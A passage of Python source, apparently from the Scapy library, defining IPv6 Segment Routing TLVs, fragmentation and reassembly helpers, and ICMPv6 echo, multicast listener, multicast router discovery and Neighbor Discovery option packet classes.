1000    5: "HMAC TLV",
1001}
1002
1003
1004class IPv6ExtHdrSegmentRoutingTLV(Packet):
1005    name = "IPv6 Option Header Segment Routing - Generic TLV"
1006    # RFC 8754 sect 2.1
1007    fields_desc = [ByteEnumField("type", None, _segment_routing_header_tlvs),
1008                   ByteField("len", 0),
1009                   StrLenField("value", "", length_from=lambda pkt: pkt.len)]
1010
1011    def extract_padding(self, p):
1012        return b"", p
1013
1014    registered_sr_tlv = {}
1015
1016    @classmethod
1017    def register_variant(cls):
1018        cls.registered_sr_tlv[cls.type.default] = cls
1019
1020    @classmethod
1021    def dispatch_hook(cls, pkt=None, *args, **kargs):
1022        if pkt:
1023            tmp_type = ord(pkt[:1])
1024            return cls.registered_sr_tlv.get(tmp_type, cls)
1025        return cls
1026
1027
1028class IPv6ExtHdrSegmentRoutingTLVIngressNode(IPv6ExtHdrSegmentRoutingTLV):
1029    name = "IPv6 Option Header Segment Routing - Ingress Node TLV"
1030    # draft-ietf-6man-segment-routing-header-06 3.1.1
1031    fields_desc = [ByteEnumField("type", 1, _segment_routing_header_tlvs),
1032                   ByteField("len", 18),
1033                   ByteField("reserved", 0),
1034                   ByteField("flags", 0),
1035                   IP6Field("ingress_node", "::1")]
1036
1037
1038class IPv6ExtHdrSegmentRoutingTLVEgressNode(IPv6ExtHdrSegmentRoutingTLV):
1039    name = "IPv6 Option Header Segment Routing - Egress Node TLV"
1040    # draft-ietf-6man-segment-routing-header-06 3.1.2
1041    fields_desc = [ByteEnumField("type", 2, _segment_routing_header_tlvs),
1042                   ByteField("len", 18),
1043                   ByteField("reserved", 0),
1044                   ByteField("flags", 0),
1045                   IP6Field("egress_node", "::1")]
1046
1047
1048class IPv6ExtHdrSegmentRoutingTLVPad1(IPv6ExtHdrSegmentRoutingTLV):
1049    name = "IPv6 Option Header Segment Routing - Pad1 TLV"
1050    # RFC8754 sect 2.1.1.1
1051    fields_desc = [ByteEnumField("type", 0, _segment_routing_header_tlvs),
1052                   FieldLenField("len", None, length_of="padding", fmt="B"),
1053                   StrLenField("padding", b"\x00", length_from=lambda pkt: pkt.len)]  # noqa: E501
1054
1055
1056class IPv6ExtHdrSegmentRoutingTLVPadN(IPv6ExtHdrSegmentRoutingTLV):
1057    name = "IPv6 Option Header Segment Routing - PadN TLV"
1058    # RFC8754 sect 2.1.1.2
1059    fields_desc = [ByteEnumField("type", 4, _segment_routing_header_tlvs),
1060                   FieldLenField("len", None, length_of="padding", fmt="B"),
1061                   StrLenField("padding", b"\x00", length_from=lambda pkt: pkt.len)]  # noqa: E501
1062
1063
1064class IPv6ExtHdrSegmentRoutingTLVHMAC(IPv6ExtHdrSegmentRoutingTLV):
1065    name = "IPv6 Option Header Segment Routing - HMAC TLV"
1066    # RFC8754 sect 2.1.2
1067    fields_desc = [ByteEnumField("type", 5, _segment_routing_header_tlvs),
1068                   FieldLenField("len", None, length_of="hmac",
1069                                 adjust=lambda _, x: x + 48),
1070                   BitField("D", 0, 1),
1071                   BitField("reserved", 0, 15),
1072                   IntField("hmackeyid", 0),
1073                   StrLenField("hmac", "",
1074                               length_from=lambda pkt: pkt.len - 48)]
1075
1076
1077class IPv6ExtHdrSegmentRouting(_IPv6ExtHdr):
1078    name = "IPv6 Option Header Segment Routing"
1079    # RFC8754 sect 2. + flag bits from draft 06
1080    fields_desc = [ByteEnumField("nh", 59, ipv6nh),
1081                   ByteField("len", None),
1082                   ByteField("type", 4),
1083                   ByteField("segleft", None),
1084                   ByteField("lastentry", None),
1085                   BitField("unused1", 0, 1),
1086                   BitField("protected", 0, 1),
1087                   BitField("oam", 0, 1),
1088                   BitField("alert", 0, 1),
1089                   BitField("hmac", 0, 1),
1090                   BitField("unused2", 0, 3),
1091                   ShortField("tag", 0),
1092                   IP6ListField("addresses", ["::1"],
1093                                count_from=lambda pkt: (pkt.lastentry + 1)),
1094                   PacketListField("tlv_objects", [],
1095                                   IPv6ExtHdrSegmentRoutingTLV,
1096                                   length_from=lambda pkt: 8 * pkt.len - 16 * (
1097                                       pkt.lastentry + 1
1098                   ))]
1099
1100    overload_fields = {IPv6: {"nh": 43}}
1101
1102    def post_build(self, pkt, pay):
1103
1104        if self.len is None:
1105
1106            # The extension must be align on 8 bytes
1107            tmp_mod = (-len(pkt) + 8) % 8
1108            if tmp_mod == 1:
1109                tlv = IPv6ExtHdrSegmentRoutingTLVPad1()
1110                pkt += raw(tlv)
1111            elif tmp_mod >= 2:
1112                # Add the padding extension
1113                tmp_pad = b"\x00" * (tmp_mod - 2)
1114                tlv = IPv6ExtHdrSegmentRoutingTLVPadN(padding=tmp_pad)
1115                pkt += raw(tlv)
1116
1117            tmp_len = (len(pkt) - 8) // 8
1118            pkt = pkt[:1] + struct.pack("B", tmp_len) + pkt[2:]
1119
1120        if self.segleft is None:
1121            tmp_len = len(self.addresses)
1122            if tmp_len:
1123                tmp_len -= 1
1124            pkt = pkt[:3] + struct.pack("B", tmp_len) + pkt[4:]
1125
1126        if self.lastentry is None:
1127            lastentry = len(self.addresses)
1128            if lastentry == 0:
1129                warning(
1130                    "IPv6ExtHdrSegmentRouting(): the addresses list is empty!"
1131                )
1132            else:
1133                lastentry -= 1
1134            pkt = pkt[:4] + struct.pack("B", lastentry) + pkt[5:]
1135
1136        return _IPv6ExtHdr.post_build(self, pkt, pay)
1137
1138
1139#                           Fragmentation Header                             #
1140
1141class IPv6ExtHdrFragment(_IPv6ExtHdr):
1142    name = "IPv6 Extension Header - Fragmentation header"
1143    fields_desc = [ByteEnumField("nh", 59, ipv6nh),
1144                   BitField("res1", 0, 8),
1145                   BitField("offset", 0, 13),
1146                   BitField("res2", 0, 2),
1147                   BitField("m", 0, 1),
1148                   IntField("id", None)]
1149    overload_fields = {IPv6: {"nh": 44}}
1150
1151    def guess_payload_class(self, p):
1152        if self.offset > 0:
1153            return Raw
1154        else:
1155            return super(IPv6ExtHdrFragment, self).guess_payload_class(p)
1156
1157
1158def defragment6(packets):
1159    """
1160    Performs defragmentation of a list of IPv6 packets. Packets are reordered.
1161    Crap is dropped. What lacks is completed by 'X' characters.
1162    """
1163
1164    # Remove non fragments
1165    lst = [x for x in packets if IPv6ExtHdrFragment in x]
1166    if not lst:
1167        return []
1168
1169    id = lst[0][IPv6ExtHdrFragment].id
1170
1171    llen = len(lst)
1172    lst = [x for x in lst if x[IPv6ExtHdrFragment].id == id]
1173    if len(lst) != llen:
1174        warning("defragment6: some fragmented packets have been removed from list")  # noqa: E501
1175
1176    # reorder fragments
1177    res = []
1178    while lst:
1179        min_pos = 0
1180        min_offset = lst[0][IPv6ExtHdrFragment].offset
1181        for p in lst:
1182            cur_offset = p[IPv6ExtHdrFragment].offset
1183            if cur_offset < min_offset:
1184                min_pos = 0
1185                min_offset = cur_offset
1186        res.append(lst[min_pos])
1187        del lst[min_pos]
1188
1189    # regenerate the fragmentable part
1190    fragmentable = b""
1191    for p in res:
1192        q = p[IPv6ExtHdrFragment]
1193        offset = 8 * q.offset
1194        if offset != len(fragmentable):
1195            warning("Expected an offset of %d. Found %d. Padding with XXXX" % (len(fragmentable), offset))  # noqa: E501
1196        fragmentable += b"X" * (offset - len(fragmentable))
1197        fragmentable += raw(q.payload)
1198
1199    # Regenerate the unfragmentable part.
1200    q = res[0].copy()
1201    nh = q[IPv6ExtHdrFragment].nh
1202    q[IPv6ExtHdrFragment].underlayer.nh = nh
1203    q[IPv6ExtHdrFragment].underlayer.plen = len(fragmentable)
1204    del q[IPv6ExtHdrFragment].underlayer.payload
1205    q /= conf.raw_layer(load=fragmentable)
1206    del q.plen
1207
1208    if q[IPv6].underlayer:
1209        q[IPv6] = IPv6(raw(q[IPv6]))
1210    else:
1211        q = IPv6(raw(q))
1212    return q
1213
1214
1215def fragment6(pkt, fragSize):
1216    """
1217    Performs fragmentation of an IPv6 packet. 'fragSize' argument is the
1218    expected maximum size of fragment data (MTU). The list of packets is
1219    returned.
1220
1221    If packet does not contain an IPv6ExtHdrFragment class, it is added to
1222    first IPv6 layer found. If no IPv6 layer exists packet is returned in
1223    result list unmodified.
1224    """
1225
1226    pkt = pkt.copy()
1227
1228    if IPv6ExtHdrFragment not in pkt:
1229        if IPv6 not in pkt:
1230            return [pkt]
1231
1232        layer3 = pkt[IPv6]
1233        data = layer3.payload
1234        frag = IPv6ExtHdrFragment(nh=layer3.nh)
1235
1236        layer3.remove_payload()
1237        del layer3.nh
1238        del layer3.plen
1239
1240        frag.add_payload(data)
1241        layer3.add_payload(frag)
1242
1243    # If the payload is bigger than 65535, a Jumbo payload must be used, as
1244    # an IPv6 packet can't be bigger than 65535 bytes.
1245    if len(raw(pkt[IPv6ExtHdrFragment])) > 65535:
1246        warning("An IPv6 packet can'be bigger than 65535, please use a Jumbo payload.")  # noqa: E501
1247        return []
1248
1249    s = raw(pkt)  # for instantiation to get upper layer checksum right
1250
1251    if len(s) <= fragSize:
1252        return [pkt]
1253
1254    # Fragmentable part : fake IPv6 for Fragmentable part length computation
1255    fragPart = pkt[IPv6ExtHdrFragment].payload
1256    tmp = raw(IPv6(src="::1", dst="::1") / fragPart)
1257    fragPartLen = len(tmp) - 40  # basic IPv6 header length
1258    fragPartStr = s[-fragPartLen:]
1259
1260    # Grab Next Header for use in Fragment Header
1261    nh = pkt[IPv6ExtHdrFragment].nh
1262
1263    # Keep fragment header
1264    fragHeader = pkt[IPv6ExtHdrFragment]
1265    del fragHeader.payload  # detach payload
1266
1267    # Unfragmentable Part
1268    unfragPartLen = len(s) - fragPartLen - 8
1269    unfragPart = pkt
1270    del pkt[IPv6ExtHdrFragment].underlayer.payload  # detach payload
1271
1272    # Cut the fragmentable part to fit fragSize. Inner fragments have
1273    # a length that is an integer multiple of 8 octets. last Frag MTU
1274    # can be anything below MTU
1275    lastFragSize = fragSize - unfragPartLen - 8
1276    innerFragSize = lastFragSize - (lastFragSize % 8)
1277
1278    if lastFragSize <= 0 or innerFragSize == 0:
1279        warning("Provided fragment size value is too low. " +
1280                "Should be more than %d" % (unfragPartLen + 8))
1281        return [unfragPart / fragHeader / fragPart]
1282
1283    remain = fragPartStr
1284    res = []
1285    fragOffset = 0     # offset, incremeted during creation
1286    fragId = random.randint(0, 0xffffffff)  # random id ...
1287    if fragHeader.id is not None:  # ... except id provided by user
1288        fragId = fragHeader.id
1289    fragHeader.m = 1
1290    fragHeader.id = fragId
1291    fragHeader.nh = nh
1292
1293    # Main loop : cut, fit to FRAGSIZEs, fragOffset, Id ...
1294    while True:
1295        if (len(remain) > lastFragSize):
1296            tmp = remain[:innerFragSize]
1297            remain = remain[innerFragSize:]
1298            fragHeader.offset = fragOffset    # update offset
1299            fragOffset += (innerFragSize // 8)  # compute new one
1300            if IPv6 in unfragPart:
1301                unfragPart[IPv6].plen = None
1302            tempo = unfragPart / fragHeader / conf.raw_layer(load=tmp)
1303            res.append(tempo)
1304        else:
1305            fragHeader.offset = fragOffset    # update offSet
1306            fragHeader.m = 0
1307            if IPv6 in unfragPart:
1308                unfragPart[IPv6].plen = None
1309            tempo = unfragPart / fragHeader / conf.raw_layer(load=remain)
1310            res.append(tempo)
1311            break
1312    return res
1313
1314
1315#############################################################################
1316#############################################################################
1317#                             ICMPv6* Classes                               #
1318#############################################################################
1319#############################################################################
1320
1321
1322icmp6typescls = {1: "ICMPv6DestUnreach",
1323                 2: "ICMPv6PacketTooBig",
1324                 3: "ICMPv6TimeExceeded",
1325                 4: "ICMPv6ParamProblem",
1326                 128: "ICMPv6EchoRequest",
1327                 129: "ICMPv6EchoReply",
1328                 130: "ICMPv6MLQuery",  # MLDv1 or MLDv2
1329                 131: "ICMPv6MLReport",
1330                 132: "ICMPv6MLDone",
1331                 133: "ICMPv6ND_RS",
1332                 134: "ICMPv6ND_RA",
1333                 135: "ICMPv6ND_NS",
1334                 136: "ICMPv6ND_NA",
1335                 137: "ICMPv6ND_Redirect",
1336                 # 138: Do Me - RFC 2894 - Seems painful
1337                 139: "ICMPv6NIQuery",
1338                 140: "ICMPv6NIReply",
1339                 141: "ICMPv6ND_INDSol",
1340                 142: "ICMPv6ND_INDAdv",
1341                 143: "ICMPv6MLReport2",
1342                 144: "ICMPv6HAADRequest",
1343                 145: "ICMPv6HAADReply",
1344                 146: "ICMPv6MPSol",
1345                 147: "ICMPv6MPAdv",
1346                 # 148: Do Me - SEND related - RFC 3971
1347                 # 149: Do Me - SEND related - RFC 3971
1348                 151: "ICMPv6MRD_Advertisement",
1349                 152: "ICMPv6MRD_Solicitation",
1350                 153: "ICMPv6MRD_Termination",
1351                 # 154: Do Me - FMIPv6 Messages - RFC 5568
1352                 155: "ICMPv6RPL",  # RFC 6550
1353                 }
1354
1355icmp6typesminhdrlen = {1: 8,
1356                       2: 8,
1357                       3: 8,
1358                       4: 8,
1359                       128: 8,
1360                       129: 8,
1361                       130: 24,
1362                       131: 24,
1363                       132: 24,
1364                       133: 8,
1365                       134: 16,
1366                       135: 24,
1367                       136: 24,
1368                       137: 40,
1369                       # 139:
1370                       # 140
1371                       141: 8,
1372                       142: 8,
1373                       143: 8,
1374                       144: 8,
1375                       145: 8,
1376                       146: 8,
1377                       147: 8,
1378                       151: 8,
1379                       152: 4,
1380                       153: 4,
1381                       155: 4
1382                       }
1383
1384icmp6types = {1: "Destination unreachable",
1385              2: "Packet too big",
1386              3: "Time exceeded",
1387              4: "Parameter problem",
1388              100: "Private Experimentation",
1389              101: "Private Experimentation",
1390              128: "Echo Request",
1391              129: "Echo Reply",
1392              130: "MLD Query",
1393              131: "MLD Report",
1394              132: "MLD Done",
1395              133: "Router Solicitation",
1396              134: "Router Advertisement",
1397              135: "Neighbor Solicitation",
1398              136: "Neighbor Advertisement",
1399              137: "Redirect Message",
1400              138: "Router Renumbering",
1401              139: "ICMP Node Information Query",
1402              140: "ICMP Node Information Response",
1403              141: "Inverse Neighbor Discovery Solicitation Message",
1404              142: "Inverse Neighbor Discovery Advertisement Message",
1405              143: "MLD Report Version 2",
1406              144: "Home Agent Address Discovery Request Message",
1407              145: "Home Agent Address Discovery Reply Message",
1408              146: "Mobile Prefix Solicitation",
1409              147: "Mobile Prefix Advertisement",
1410              148: "Certification Path Solicitation",
1411              149: "Certification Path Advertisement",
1412              151: "Multicast Router Advertisement",
1413              152: "Multicast Router Solicitation",
1414              153: "Multicast Router Termination",
1415              155: "RPL Control Message",
1416              200: "Private Experimentation",
1417              201: "Private Experimentation"}
1418
1419
1420class _ICMPv6(Packet):
1421    name = "ICMPv6 dummy class"
1422    overload_fields = {IPv6: {"nh": 58}}
1423
1424    def post_build(self, p, pay):
1425        p += pay
1426        if self.cksum is None:
1427            chksum = in6_chksum(58, self.underlayer, p)
1428            p = p[:2] + struct.pack("!H", chksum) + p[4:]
1429        return p
1430
1431    def hashret(self):
1432        return self.payload.hashret()
1433
1434    def answers(self, other):
1435        # isinstance(self.underlayer, _IPv6ExtHdr) may introduce a bug ...
1436        if (isinstance(self.underlayer, IPerror6) or
1437            isinstance(self.underlayer, _IPv6ExtHdr) and
1438                isinstance(other, _ICMPv6)):
1439            if not ((self.type == other.type) and
1440                    (self.code == other.code)):
1441                return 0
1442            return 1
1443        return 0
1444
1445
1446class _ICMPv6Error(_ICMPv6):
1447    name = "ICMPv6 errors dummy class"
1448
1449    def guess_payload_class(self, p):
1450        return IPerror6
1451
1452
1453class ICMPv6Unknown(_ICMPv6):
1454    name = "Scapy6 ICMPv6 fallback class"
1455    fields_desc = [ByteEnumField("type", 1, icmp6types),
1456                   ByteField("code", 0),
1457                   XShortField("cksum", None),
1458                   StrField("msgbody", "")]
1459
1460
1461#                                  RFC 2460                                  #
1462
1463class ICMPv6DestUnreach(_ICMPv6Error):
1464    name = "ICMPv6 Destination Unreachable"
1465    fields_desc = [ByteEnumField("type", 1, icmp6types),
1466                   ByteEnumField("code", 0, {0: "No route to destination",
1467                                             1: "Communication with destination administratively prohibited",  # noqa: E501
1468                                             2: "Beyond scope of source address",  # noqa: E501
1469                                             3: "Address unreachable",
1470                                             4: "Port unreachable"}),
1471                   XShortField("cksum", None),
1472                   ByteField("length", 0),
1473                   X3BytesField("unused", 0),
1474                   _ICMPExtensionPadField(),
1475                   _ICMPExtensionField()]
1476    post_dissection = _ICMP_extpad_post_dissection
1477
1478
1479class ICMPv6PacketTooBig(_ICMPv6Error):
1480    name = "ICMPv6 Packet Too Big"
1481    fields_desc = [ByteEnumField("type", 2, icmp6types),
1482                   ByteField("code", 0),
1483                   XShortField("cksum", None),
1484                   IntField("mtu", 1280)]
1485
1486
1487class ICMPv6TimeExceeded(_ICMPv6Error):
1488    name = "ICMPv6 Time Exceeded"
1489    fields_desc = [ByteEnumField("type", 3, icmp6types),
1490                   ByteEnumField("code", 0, {0: "hop limit exceeded in transit",  # noqa: E501
1491                                             1: "fragment reassembly time exceeded"}),  # noqa: E501
1492                   XShortField("cksum", None),
1493                   ByteField("length", 0),
1494                   X3BytesField("unused", 0),
1495                   _ICMPExtensionPadField(),
1496                   _ICMPExtensionField()]
1497    post_dissection = _ICMP_extpad_post_dissection
1498
1499
1500# The default pointer value is set to the next header field of
1501# the encapsulated IPv6 packet
1502
1503
1504class ICMPv6ParamProblem(_ICMPv6Error):
1505    name = "ICMPv6 Parameter Problem"
1506    fields_desc = [ByteEnumField("type", 4, icmp6types),
1507                   ByteEnumField(
1508                       "code", 0,
1509                       {0: "erroneous header field encountered",
1510                        1: "unrecognized Next Header type encountered",
1511                        2: "unrecognized IPv6 option encountered",
1512                        3: "first fragment has incomplete header chain"}),
1513                   XShortField("cksum", None),
1514                   IntField("ptr", 6)]
1515
1516
1517class ICMPv6EchoRequest(_ICMPv6):
1518    name = "ICMPv6 Echo Request"
1519    fields_desc = [ByteEnumField("type", 128, icmp6types),
1520                   ByteField("code", 0),
1521                   XShortField("cksum", None),
1522                   XShortField("id", 0),
1523                   XShortField("seq", 0),
1524                   StrField("data", "")]
1525
1526    def mysummary(self):
1527        return self.sprintf("%name% (id: %id% seq: %seq%)")
1528
1529    def hashret(self):
1530        return struct.pack("HH", self.id, self.seq) + self.payload.hashret()
1531
1532
1533class ICMPv6EchoReply(ICMPv6EchoRequest):
1534    name = "ICMPv6 Echo Reply"
1535    type = 129
1536
1537    def answers(self, other):
1538        # We could match data content between request and reply.
1539        return (isinstance(other, ICMPv6EchoRequest) and
1540                self.id == other.id and self.seq == other.seq and
1541                self.data == other.data)
1542
1543
1544#            ICMPv6 Multicast Listener Discovery (RFC2710)                  #
1545
1546# tous les messages MLD sont emis avec une adresse source lien-locale
1547# -> Y veiller dans le post_build si aucune n'est specifiee
1548# La valeur de Hop-Limit doit etre de 1
1549# "and an IPv6 Router Alert option in a Hop-by-Hop Options
1550# header. (The router alert option is necessary to cause routers to
1551# examine MLD messages sent to multicast addresses in which the router
1552# itself has no interest"
1553class _ICMPv6ML(_ICMPv6):
1554    fields_desc = [ByteEnumField("type", 130, icmp6types),
1555                   ByteField("code", 0),
1556                   XShortField("cksum", None),
1557                   ShortField("mrd", 0),
1558                   ShortField("reserved", 0),
1559                   IP6Field("mladdr", "::")]
1560
1561# general queries are sent to the link-scope all-nodes multicast
1562# address ff02::1, with a multicast address field of 0 and a MRD of
1563# [Query Response Interval]
1564# Default value for mladdr is set to 0 for a General Query, and
1565# overloaded by the user for a Multicast Address specific query
1566# TODO : See what we can do to automatically include a Router Alert
1567#        Option in a Destination Option Header.
1568
1569
1570class ICMPv6MLQuery(_ICMPv6ML):  # RFC 2710
1571    name = "MLD - Multicast Listener Query"
1572    type = 130
1573    mrd = 10000  # 10s for mrd
1574    mladdr = "::"
1575    overload_fields = {IPv6: {"dst": "ff02::1", "hlim": 1, "nh": 58}}
1576
1577
1578# TODO : See what we can do to automatically include a Router Alert
1579#        Option in a Destination Option Header.
1580class ICMPv6MLReport(_ICMPv6ML):  # RFC 2710
1581    name = "MLD - Multicast Listener Report"
1582    type = 131
1583    overload_fields = {IPv6: {"hlim": 1, "nh": 58}}
1584
1585    def answers(self, query):
1586        """Check the query type"""
1587        return ICMPv6MLQuery in query
1588
1589# When a node ceases to listen to a multicast address on an interface,
1590# it SHOULD send a single Done message to the link-scope all-routers
1591# multicast address (FF02::2), carrying in its multicast address field
1592# the address to which it is ceasing to listen
1593# TODO : See what we can do to automatically include a Router Alert
1594#        Option in a Destination Option Header.
1595
1596
1597class ICMPv6MLDone(_ICMPv6ML):  # RFC 2710
1598    name = "MLD - Multicast Listener Done"
1599    type = 132
1600    overload_fields = {IPv6: {"dst": "ff02::2", "hlim": 1, "nh": 58}}
1601
1602
1603#            Multicast Listener Discovery Version 2 (MLDv2) (RFC3810)       #
1604
1605class ICMPv6MLQuery2(_ICMPv6):  # RFC 3810
1606    name = "MLDv2 - Multicast Listener Query"
1607    fields_desc = [ByteEnumField("type", 130, icmp6types),
1608                   ByteField("code", 0),
1609                   XShortField("cksum", None),
1610                   ShortField("mrd", 10000),
1611                   ShortField("reserved", 0),
1612                   IP6Field("mladdr", "::"),
1613                   BitField("Resv", 0, 4),
1614                   BitField("S", 0, 1),
1615                   BitField("QRV", 0, 3),
1616                   ByteField("QQIC", 0),
1617                   ShortField("sources_number", None),
1618                   IP6ListField("sources", [],
1619                                count_from=lambda pkt: pkt.sources_number)]
1620
1621    # RFC8810 - 4. Message Formats
1622    overload_fields = {IPv6: {"dst": "ff02::1", "hlim": 1, "nh": 58}}
1623
1624    def post_build(self, packet, payload):
1625        """Compute the 'sources_number' field when needed"""
1626        if self.sources_number is None:
1627            srcnum = struct.pack("!H", len(self.sources))
1628            packet = packet[:26] + srcnum + packet[28:]
1629        return _ICMPv6.post_build(self, packet, payload)
1630
1631
1632class ICMPv6MLDMultAddrRec(Packet):
1633    name = "ICMPv6 MLDv2 - Multicast Address Record"
1634    fields_desc = [ByteField("rtype", 4),
1635                   FieldLenField("auxdata_len", None,
1636                                 length_of="auxdata",
1637                                 fmt="B"),
1638                   FieldLenField("sources_number", None,
1639                                 length_of="sources",
1640                                 adjust=lambda p, num: num // 16),
1641                   IP6Field("dst", "::"),
1642                   IP6ListField("sources", [],
1643                                length_from=lambda p: 16 * p.sources_number),
1644                   StrLenField("auxdata", "",
1645                               length_from=lambda p: p.auxdata_len)]
1646
1647    def default_payload_class(self, packet):
1648        """Multicast Address Record followed by another one"""
1649        return self.__class__
1650
1651
1652class ICMPv6MLReport2(_ICMPv6):  # RFC 3810
1653    name = "MLDv2 - Multicast Listener Report"
1654    fields_desc = [ByteEnumField("type", 143, icmp6types),
1655                   ByteField("res", 0),
1656                   XShortField("cksum", None),
1657                   ShortField("reserved", 0),
1658                   ShortField("records_number", None),
1659                   PacketListField("records", [],
1660                                   ICMPv6MLDMultAddrRec,
1661                                   count_from=lambda p: p.records_number)]
1662
1663    # RFC8810 - 4. Message Formats
1664    overload_fields = {IPv6: {"dst": "ff02::16", "hlim": 1, "nh": 58}}
1665
1666    def post_build(self, packet, payload):
1667        """Compute the 'records_number' field when needed"""
1668        if self.records_number is None:
1669            recnum = struct.pack("!H", len(self.records))
1670            packet = packet[:6] + recnum + packet[8:]
1671        return _ICMPv6.post_build(self, packet, payload)
1672
1673    def answers(self, query):
1674        """Check the query type"""
1675        return isinstance(query, ICMPv6MLQuery2)
1676
1677
1678#          ICMPv6 MRD - Multicast Router Discovery (RFC 4286)               #
1679
1680# TODO:
1681# - 04/09/06 troglocan : find a way to automatically add a router alert
1682#            option for all MRD packets. This could be done in a specific
1683#            way when IPv6 is the under layer with some specific keyword
1684#            like 'exthdr'. This would allow to keep compatibility with
1685#            providing IPv6 fields to be overloaded in fields_desc.
1686#
1687#            At the moment, if user inserts an IPv6 Router alert option
1688#            none of the IPv6 default values of IPv6 layer will be set.
1689
1690class ICMPv6MRD_Advertisement(_ICMPv6):
1691    name = "ICMPv6 Multicast Router Discovery Advertisement"
1692    fields_desc = [ByteEnumField("type", 151, icmp6types),
1693                   ByteField("advinter", 20),
1694                   XShortField("cksum", None),
1695                   ShortField("queryint", 0),
1696                   ShortField("robustness", 0)]
1697    overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::2"}}
1698    # IPv6 Router Alert requires manual inclusion
1699
1700    def extract_padding(self, s):
1701        return s[:8], s[8:]
1702
1703
1704class ICMPv6MRD_Solicitation(_ICMPv6):
1705    name = "ICMPv6 Multicast Router Discovery Solicitation"
1706    fields_desc = [ByteEnumField("type", 152, icmp6types),
1707                   ByteField("res", 0),
1708                   XShortField("cksum", None)]
1709    overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::2"}}
1710    # IPv6 Router Alert requires manual inclusion
1711
1712    def extract_padding(self, s):
1713        return s[:4], s[4:]
1714
1715
1716class ICMPv6MRD_Termination(_ICMPv6):
1717    name = "ICMPv6 Multicast Router Discovery Termination"
1718    fields_desc = [ByteEnumField("type", 153, icmp6types),
1719                   ByteField("res", 0),
1720                   XShortField("cksum", None)]
1721    overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::6A"}}
1722    # IPv6 Router Alert requires manual inclusion
1723
1724    def extract_padding(self, s):
1725        return s[:4], s[4:]
1726
1727
1728#                   ICMPv6 Neighbor Discovery (RFC 2461)                    #
1729
1730icmp6ndopts = {1: "Source Link-Layer Address",
1731               2: "Target Link-Layer Address",
1732               3: "Prefix Information",
1733               4: "Redirected Header",
1734               5: "MTU",
1735               6: "NBMA Shortcut Limit Option",  # RFC2491
1736               7: "Advertisement Interval Option",
1737               8: "Home Agent Information Option",
1738               9: "Source Address List",
1739               10: "Target Address List",
1740               11: "CGA Option",            # RFC 3971
1741               12: "RSA Signature Option",  # RFC 3971
1742               13: "Timestamp Option",      # RFC 3971
1743               14: "Nonce option",          # RFC 3971
1744               15: "Trust Anchor Option",   # RFC 3971
1745               16: "Certificate Option",    # RFC 3971
1746               17: "IP Address Option",                             # RFC 4068
1747               18: "New Router Prefix Information Option",          # RFC 4068
1748               19: "Link-layer Address Option",                     # RFC 4068
1749               20: "Neighbor Advertisement Acknowledgement Option",
1750               21: "CARD Request Option",  # RFC 4065/4066/4067
1751               22: "CARD Reply Option",   # RFC 4065/4066/4067
1752               23: "MAP Option",          # RFC 4140
1753               24: "Route Information Option",  # RFC 4191
1754               25: "Recursive DNS Server Option",
1755               26: "IPv6 Router Advertisement Flags Option"
1756               }
1757
1758icmp6ndoptscls = {1: "ICMPv6NDOptSrcLLAddr",
1759                  2: "ICMPv6NDOptDstLLAddr",
1760                  3: "ICMPv6NDOptPrefixInfo",
1761                  4: "ICMPv6NDOptRedirectedHdr",
1762                  5: "ICMPv6NDOptMTU",
1763                  6: "ICMPv6NDOptShortcutLimit",
1764                  7: "ICMPv6NDOptAdvInterval",
1765                  8: "ICMPv6NDOptHAInfo",
1766                  9: "ICMPv6NDOptSrcAddrList",
1767                  10: "ICMPv6NDOptTgtAddrList",
1768                  # 11: ICMPv6NDOptCGA, RFC3971 - contrib/send.py
1769                  # 12: ICMPv6NDOptRsaSig, RFC3971 - contrib/send.py
1770                  # 13: ICMPv6NDOptTmstp, RFC3971 - contrib/send.py
1771                  # 14: ICMPv6NDOptNonce, RFC3971 - contrib/send.py
1772                  # 15: Do Me,
1773                  # 16: Do Me,
1774                  17: "ICMPv6NDOptIPAddr",
1775                  18: "ICMPv6NDOptNewRtrPrefix",
1776                  19: "ICMPv6NDOptLLA",
1777                  # 18: Do Me,
1778                  # 19: Do Me,
1779                  # 20: Do Me,
1780                  # 21: Do Me,
1781                  # 22: Do Me,
1782                  23: "ICMPv6NDOptMAP",
1783                  24: "ICMPv6NDOptRouteInfo",
1784                  25: "ICMPv6NDOptRDNSS",
1785                  26: "ICMPv6NDOptEFA",
1786                  31: "ICMPv6NDOptDNSSL",
1787                  37: "ICMPv6NDOptCaptivePortal",
1788                  38: "ICMPv6NDOptPREF64",
1789                  }
1790
1791icmp6ndraprefs = {0: "Medium (default)",
1792                  1: "High",
1793                  2: "Reserved",
1794                  3: "Low"}  # RFC 4191
1795
1796
1797class _ICMPv6NDGuessPayload:
1798    name = "Dummy ND class that implements guess_payload_class()"
1799
1800    def guess_payload_class(self, p):
1801        if len(p) > 1:
1802            return icmp6ndoptscls.get(orb(p[0]), ICMPv6NDOptUnknown)
1803
1804
1805# Beginning of ICMPv6 Neighbor Discovery Options.
1806
1807class ICMPv6NDOptDataField(StrLenField):
1808    __slots__ = ["strip_zeros"]
1809
1810    def __init__(self, name, default, strip_zeros=False, **kwargs):
1811        super().__init__(name, default, **kwargs)
1812        self.strip_zeros = strip_zeros
1813
1814    def i2len(self, pkt, x):
1815        return len(self.i2m(pkt, x))
1816
1817    def i2m(self, pkt, x):
1818        r = (len(x) + 2) % 8
1819        if r:
1820            x += b"\x00" * (8 - r)
1821        return x
1822
1823    def m2i(self, pkt, x):
1824        if self.strip_zeros:
1825            x = x.rstrip(b"\x00")
1826        return x
1827
1828
1829class ICMPv6NDOptUnknown(_ICMPv6NDGuessPayload, Packet):
1830    name = "ICMPv6 Neighbor Discovery Option - Scapy Unimplemented"
1831    fields_desc = [ByteField("type", 0),
1832                   FieldLenField("len", None, length_of="data", fmt="B",
1833                                 adjust=lambda pkt, x: (2 + x) // 8),
1834                   ICMPv6NDOptDataField("data", "", strip_zeros=False,
1835                                        length_from=lambda pkt:
1836                                        8 * max(pkt.len, 1) - 2)]
1837
1838# NOTE: len includes type and len field. Expressed in unit of 8 bytes
1839# TODO: Revoir le coup du ETHER_ANY
1840
1841
1842class ICMPv6NDOptSrcLLAddr(_ICMPv6NDGuessPayload, Packet):
1843    name = "ICMPv6 Neighbor Discovery Option - Source Link-Layer Address"
1844    fields_desc = [ByteField("type", 1),
1845                   ByteField("len", 1),
1846                   SourceMACField("lladdr")]
1847
1848    def mysummary(self):
1849        return self.sprintf("%name% %lladdr%")
1850
1851
